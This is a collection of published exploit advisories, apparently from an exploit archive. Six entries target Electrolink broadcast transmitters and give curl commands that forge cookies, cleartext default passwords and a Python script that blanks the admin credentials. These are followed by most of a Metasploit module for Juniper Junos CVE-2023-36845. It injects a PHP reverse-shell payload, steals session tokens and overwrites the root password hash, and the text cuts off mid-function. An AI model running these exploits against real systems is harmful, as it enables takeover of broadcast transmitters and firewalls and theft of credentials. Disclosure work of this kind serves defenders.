<pre><code><br />Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state of the art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the art DAB modulator with excellent performances,<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust desing<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The device allows an unauthenticated attacker to bypass<br />authentication and modify the Cookie to reveal hidden pages<br />that allows more critical operations to the transmitter.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5794<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5794.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/home.htm" | findstr /spina:d "admin"<br />33:<a class="linkm admin" href="/setting.htm">Setting & Status</a><br />34:<a class="linkm admin" href="/lan.htm">Setting lan</a><br />35:<a class="linkm admin" href="/snmp.htm">Setting snmp</a><br />36:<a class="linkm admin" href="/mail.htm">Setting e-mail</a><br />37:<a class="linkm admin" href="/login.htm">Setting login</a><br />38:<a class="linkm admin superadmin" href="/admin.htm">Setting admin</a><br />39:<a class="linkm admin superadmin" href="/terminal.htm">Terminal</a><br />...<br />C:\>curl -s "http://192.168.150.77:8888/admin.htm" -H "Cookie: Login=ZSL"<br />C:\>curl -s "http://192.168.150.77:8888/terminal.htm" -H "Cookie: Login=ZSL"<br /></code></pre>
<pre><code><br />Electrolink FM/DAB/TV Transmitter Vertical Privilege Escalation<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state of the art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the art DAB modulator with excellent performances,<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust desing<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The application suffers from a privilege escalation<br />vulnerability. An attacker can escalate his privileges by<br />poisoning the Cookie from GUEST to ADMIN to effectively<br />become Administrator or poisoning to ZSL to become Super<br />Administrator.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5793<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5793.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/mail.htm" -H "Cookie: Login=ADMIN" #changed Login=GUEST<br /></code></pre>
<pre><code>#!/usr/bin/env python<br />#<br />#<br /># Electrolink FM/DAB/TV Transmitter Remote Authentication Removal<br />#<br />#<br /># Vendor: Electrolink s.r.l.<br /># Product web page: https://www.electrolink.com<br /># Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /># 500W, 1kW, 2kW Medium DAB Transmitter<br /># 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /># 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /># 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /># 15W - 40kW Digital FM Transmitter<br /># BI, BIII VHF TV Transmitter<br /># 10W - 5kW UHF TV Transmitter<br /># Web version: 01.09, 01.08, 01.07<br /># Display version: 1.4, 1.2<br /># Control unit version: 01.06, 01.04, 01.03<br /># Firmware version: 2.1<br />#<br /># Summary: Since 1990 Electrolink has been dealing with design and<br /># manufacturing of advanced technologies for radio and television<br /># broadcasting. The most comprehensive products range includes: FM<br /># Transmitters, DAB Transmitters, TV Transmitters for analogue and<br /># digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br /># DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br /># switches, Manual patch panels, RF power meters, Rigid line and<br /># accessories. A professional solution that meets broadcasters needs<br /># from small community television or radio to big government networks.<br />#<br /># Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br /># touch-screen display and in-built state of the art DAB modulator,<br /># EDI input and GPS receiver. All transmitters are equipped with a<br /># state-of-the art DAB modulator with excellent performances,<br /># self-protected and self-controlled amplifiers ensure trouble-free<br /># non-stop operation.<br />#<br /># 100W, 500W, 1kW and 2kW power range available on compact 2U and<br /># 3U 19" frame. Built-in stereo coder, touch screen display and<br /># efficient low noise air cooling system. Available models: 3kW,<br /># 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br /># with fully broadband solid state amplifiers and an efficient<br /># low-noise air cooling system.<br />#<br /># FM digital modulator with excellent specifications, built-in<br /># stereo and RDS coder. Digital deviation limiter together with<br /># ASI and SDI inputs are available. These transmitters are ready<br /># for ISOFREQUENCY networks.<br />#<br /># Available for VHF BI and VHF BIII operation with robust desing<br /># and user-friendly local and remote control. Multi-standard UHF<br /># TV transmitters from 10W up to 5kW with efficient low noise air<br /># cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br /># and ISDB-Tb available.<br />#<br /># Desc: The application is vulnerable to an unauthenticated<br /># parameter manipulation that allows an attacker to set the<br /># credentials to blank giving her access to the admin panel.<br /># Also vulnerable to account takeover and arbitrary password<br /># change.<br />#<br /># Tested on: Mbedthis-Appweb/12.5.0<br /># Mbedthis-Appweb/12.0.0<br />#<br />#<br /># Vulnerability discovered by Neurogenesia<br /># Macedonian Information Security Research & Development Laboratory<br /># Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5792<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php<br />#<br />#<br /># 30.06.2023<br />#<br />#<br /><br /><br />import datetime<br />import requests<br /><br />dt = datetime.datetime.now()<br />dt = dt.strftime('%d.%m.%Y %H:%M:%S')<br />nul = ''<br /><br />print('Starting transmitter exploit at', dt)<br /><br />ip = input('Enter transmitter ip: ')<br />if 'http' not in ip:<br /> ip = 'http://' + ip<br /><br />ep = '/login.htm'<br />url = ip + ep<br /><br />signature = {'Accept-Encoding' : 'gzip, deflate',<br /> 'Accept-Language' : 'ku-MK,en;q=0.1806',<br /> 'User-Agent' : 'Broadcastso/B.B',<br /> 'Connection' : 'keep-alive'<br /> }<br /># ----------------- Line breaker v0.17 -----------------<br />postd = { 'adminuser' : nul,<br /> 'guestuser' : nul,<br /> 'adminpassword' : nul,<br /> 'guestpassword' : nul<br /> }<br /><br />print('Removing security control...')<br />r = requests.post(url, data = postd, headers = signature)<br />if r.status_code == 200:<br /> print('Done. Go and "Login".')<br />else:<br /> print('Error')<br />exit(-4)<br /></code></pre>
<pre><code><br />Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state of the art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the art DAB modulator with excellent performances,<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust desing<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The transmitter is vulnerable to an authentication bypass<br />vulnerability affecting the Login Cookie. An attacker can set<br />an arbitrary value except 'NO' to the Login Cookie and have<br />full system access.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5791<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN"<br /></code></pre>
<pre><code><br />Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state of the art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the art DAB modulator with excellent performances,<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust desing<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The device is vulnerable to a disclosure of clear-text<br />credentials in controlloLogin.js that can allow security<br />bypass and system access.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5790<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"<br />function verifica() {<br /> var user = document.getElementById('user').value;<br /> var password = document.getElementById('password').value;<br /><br /> //alert(user);<br /><br /> if(user=='admin' && password=='cozzir'){<br /> SetCookie('Login','OK',exp);<br /> window.location.replace("FrameSetCore.html");<br /> }else{<br /> SetCookie('Login','NO',exp);<br /> window.location.replace("login.html");<br /> }<br />}<br /></code></pre>
<pre><code><br />Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure<br /><br /><br />Vendor: Electrolink s.r.l.<br />Product web page: https://www.electrolink.com<br />Affected version: 10W, 100W, 250W, Compact DAB Transmitter<br /> 500W, 1kW, 2kW Medium DAB Transmitter<br /> 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter<br /> 100W, 500W, 1kW, 2kW Compact FM Transmitter<br /> 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter<br /> 15W - 40kW Digital FM Transmitter<br /> BI, BIII VHF TV Transmitter<br /> 10W - 5kW UHF TV Transmitter<br /> Web version: 01.09, 01.08, 01.07<br /> Display version: 1.4, 1.2<br /> Control unit version: 01.06, 01.04, 01.03<br /> Firmware version: 2.1<br /><br />Summary: Since 1990 Electrolink has been dealing with design and<br />manufacturing of advanced technologies for radio and television<br />broadcasting. The most comprehensive products range includes: FM<br />Transmitters, DAB Transmitters, TV Transmitters for analogue and<br />digital multistandard operation, Bandpass Filters (FM, DAB, ATV,<br />DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial<br />switches, Manual patch panels, RF power meters, Rigid line and<br />accessories. A professional solution that meets broadcasters needs<br />from small community television or radio to big government networks.<br /><br />Compact DAB Transmitters 10W, 100W and 250W models with 3.5"<br />touch-screen display and in-built state of the art DAB modulator,<br />EDI input and GPS receiver. All transmitters are equipped with a<br />state-of-the art DAB modulator with excellent performances,<br />self-protected and self-controlled amplifiers ensure trouble-free<br />non-stop operation.<br /><br />100W, 500W, 1kW and 2kW power range available on compact 2U and<br />3U 19" frame. Built-in stereo coder, touch screen display and<br />efficient low noise air cooling system. Available models: 3kW,<br />5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters<br />with fully broadband solid state amplifiers and an efficient<br />low-noise air cooling system.<br /><br />FM digital modulator with excellent specifications, built-in<br />stereo and RDS coder. Digital deviation limiter together with<br />ASI and SDI inputs are available. These transmitters are ready<br />for ISOFREQUENCY networks.<br /><br />Available for VHF BI and VHF BIII operation with robust desing<br />and user-friendly local and remote control. Multi-standard UHF<br />TV transmitters from 10W up to 5kW with efficient low noise air<br />cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC<br />and ISDB-Tb available.<br /><br />Desc: The device is vulnerable to a disclosure of clear-text<br />credentials in login.htm and mail.htm that can allow security<br />bypass and system access.<br /><br />Tested on: Mbedthis-Appweb/12.5.0<br /> Mbedthis-Appweb/12.0.0<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research & Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5789<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5789.php<br /><br /><br />30.06.2023<br /><br />--<br /><br /><br />C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw"<br />55:<td class=cd31>Admin password</td><br />56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td><br />63:<td class=cd31>Guest password</td><br />64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td><br />C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw"<br />93:<td class=cd31>Server password</td><br />94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'unix_crypt'<br />require 'net/ssh'<br />require 'net/ssh/command_stream'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::SSH<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Junos OS PHPRC Environment Variable Manipulation RCE',<br /> 'Description' => %q{<br /> This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls<br /> and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin<br /> by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being<br /> 'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP<br /> function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling<br /> allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses<br /> data:// to provide a file inline which includes the base64 encoded PHP payload.<br /><br /> By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a<br /> datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated<br /> to the J-Web application, in order to overwrite the the root password hash. If there is no user<br /> authenticated to the J-Web application this method will not work. The module then authenticates<br /> with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.<br /> },<br /> 'Author' => [<br /> 'Jacob Baines', # Analysis<br /> 'Ron Bowes', # Jail break technique + Target setup instructions<br /> 'jheysel-r7' # Msf module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/'],<br /> [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'],<br /> [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'],<br /> [ 'CVE', '2023-36845']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => %w[php unix],<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php_memory,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp',<br /> 'RPORT' => 80<br /> }<br /> },<br /> ],<br /> [<br /> 'Interactive SSH with jail break',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => 'unix',<br /> 'Type' => :nix_stream,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/interact',<br /> 'WfsDelay' => 30<br /> },<br /> 'Payload' => {<br /> 'Compat' => {<br /> 'PayloadType' => 'cmd_interact',<br /> 'ConnectionType' => 'find'<br /> }<br /> }<br /> }<br /> ]<br /><br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-08-17',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ CONFIG_CHANGES ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TMP_ROOT_PASSWORD', [ true, 'If target is set to "Interactive SSH with jail break", the root user\'s password will be temporarily changed to this password', rand_text_alphanumeric(24)]),<br /> OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]),<br /> OptInt.new('SSH_TIMEOUT', [ true, 'The maximum acceptable amount of time to negotiate a SSH session', 30])<br /> ])<br /> end<br /><br /> def check<br /> non_existent_file = rand_text_alphanumeric(8..16)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'data' => "LD_PRELOAD=/tmp/#{non_existent_file}"<br /> )<br /><br /> return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?("Cannot open \"/tmp/#{non_existent_file}\"")<br /><br /> CheckCode::Safe('Environment variable manipulation failed indicating this target is not vulnerable.')<br /> end<br /><br /> def send_php_exploit(phprc, file_contents)<br /> post_data = "allow_url_include=1\n"<br /> post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(file_contents)}\""<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'POST',<br /> 'data' => post_data,<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_get' => {<br /> 'PHPRC' => phprc<br /> }<br /> )<br /> end<br /><br /> def get_php_session_id<br /> get_var_sess = "<?php print_r(scandir('/var/sess'));?>"<br /> res = send_php_exploit('/dev/fd/0', get_var_sess)<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /><br /> php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]<br /><br /> fail_with(Failure::UnexpectedReply, "Failed to retrieve a PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id<br /> print_status("Found PHPSESSID: #{php_session_id}.")<br /> php_session_id<br /> end<br /><br /> def get_csrf_token(php_session_id)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'diagnose'),<br /> 'method' => 'GET',<br /> 'headers' =><br /> {<br /> 'Cookie' => "PHPSESSID=#{php_session_id}"<br /> },<br /> 'vars_get' => {<br /> 'm[]' => 'pinghost'<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /><br /> csrf_token = res.get_html_document.xpath("//input[@type='hidden' and @name='csrf_token']/@value").text<br /> fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token<br /> print_status("Found csrf token: #{csrf_token}.")<br /> csrf_token<br /> end<br /><br /> def get_encrypted_root_password(php_session_id, csrf_token)<br /> post_data = "rs=get_cli_data&rsargs[]=getQuery&csrf_token=#{csrf_token}&key=1"<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'jsdm', 'ajax', 'cli-editor.php'),<br /> 'method' => 'POST',<br /> 'data' => post_data,<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'headers' =><br /> {<br /> 'Cookie' => "PHPSESSID=#{php_session_id}"<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /><br /> # The body of the above request is formatted like so:<br /><br /> ## Last changed: 2023-09-25 13:00:49 UTC<br /> # version 20200609.165031.6_builder.r1115480;<br /> # system {<br /> # host-name JUNOS;<br /> # root-authentication {<br /> # encrypted-password "$6$yMwZY.o0$WwCZgzN7FTDfhSvkum0y9ry/nu4yWOQcgW.JJz0vJapf5P6XHoCsigsz94oEKSPO5efKFP/JhhN3/FCKvB0Hp.";<br /> # }<br /> # login {<br /> # user admin {<br /> # uid 2000;<br /> # class super-user;<br /> # authentication {<br /> # encrypted-password "$6$65gs/MrK$DNpVWfIocQ.rG/ThjZXjRI/yha/lf1UImNKivq.T1K4yLW60PWFrcQakoP6mwHT9Cr3xQZZfomKSTRXWl2aWj1";<br /> # }<br /> # }<br /><br /> fail_with(Failure::UnexpectedReply, 'ssh root-login is not permitted on the device thus the module will not be able to establish a session or restore the original root password.') unless res.body.scan(/"ssh\s+\{\n\s+root-login\s+allow;"/)<br /> # Multiple passwords are displayed in the output, ensure we grab the encrypted-password that belongs to the<br /> # root-authentication configuration with the following regex:<br /> og_encrypted_root_pass = res.body.scan(/root-authentication\s+\{\n\s+encrypted-password\s+"(.+)"/).flatten[0]<br /> fail_with(Failure::UnexpectedReply, 'Unable to retrieve the encrypted root password from the response') unless og_encrypted_root_pass<br /><br /> print_status("Original encrypted root password: #{og_encrypted_root_pass}")<br /> og_encrypted_root_pass<br /> end<br /><br /> def set_root_password(php_session_id, csrf_token, password_hash)<br /> post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}"<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'),<br /> 'method' => 'POST',<br /> 'data' => post_data,<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'headers' =><br /> {<br /> 'Cookie' => "PHPSESSID=#{php_session_id}"<br /> },<br /> 